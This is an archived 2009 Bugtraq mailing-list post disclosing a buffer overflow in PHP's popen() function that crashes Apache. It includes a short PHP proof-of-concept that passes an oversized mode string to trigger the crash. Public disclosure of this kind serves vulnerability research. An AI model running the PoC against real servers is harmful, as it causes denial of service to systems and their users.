lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20090112133637.24790.qmail@securityfocus.com>
Date: 12 Jan 2009 13:36:37 -0000
From: ew1zz@...mail.com
To: bugtraq@...urityfocus.com
Subject: PHP Buffer Overflow(popen)

Apache 2.2.11/PHP 5.2.8 Buffer Overflow Exploit (popen func)

Type: Remote and Local

Requirements for exploit: popen() enabled.


By: e.wiZz!  Enes Muši&#263;   ew1zz@...mail.com


PHP Popen() function overview:

Popen function in php opens a pipe to a process executed by forking the command given by command.
It was implementet since PHP 4 version.
     popen ( string $command_to_execute , string $mode )

Second argument is vulnerable to buffer overflow.Reason why i mentioned Apache here,is because
when we execute poc.php Apache HTTP server crash without any report in error log.You can test on WAMP too,on CLI or browser.


Tested on: PHP 5.2.8/4.2.1/4.2.0
           Apache 2.2.11


PoC:


<?php
$____buff=str_repeat("A",9999);
$handle = popen('/whatever/', $____buff);
echo $handle;
?>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ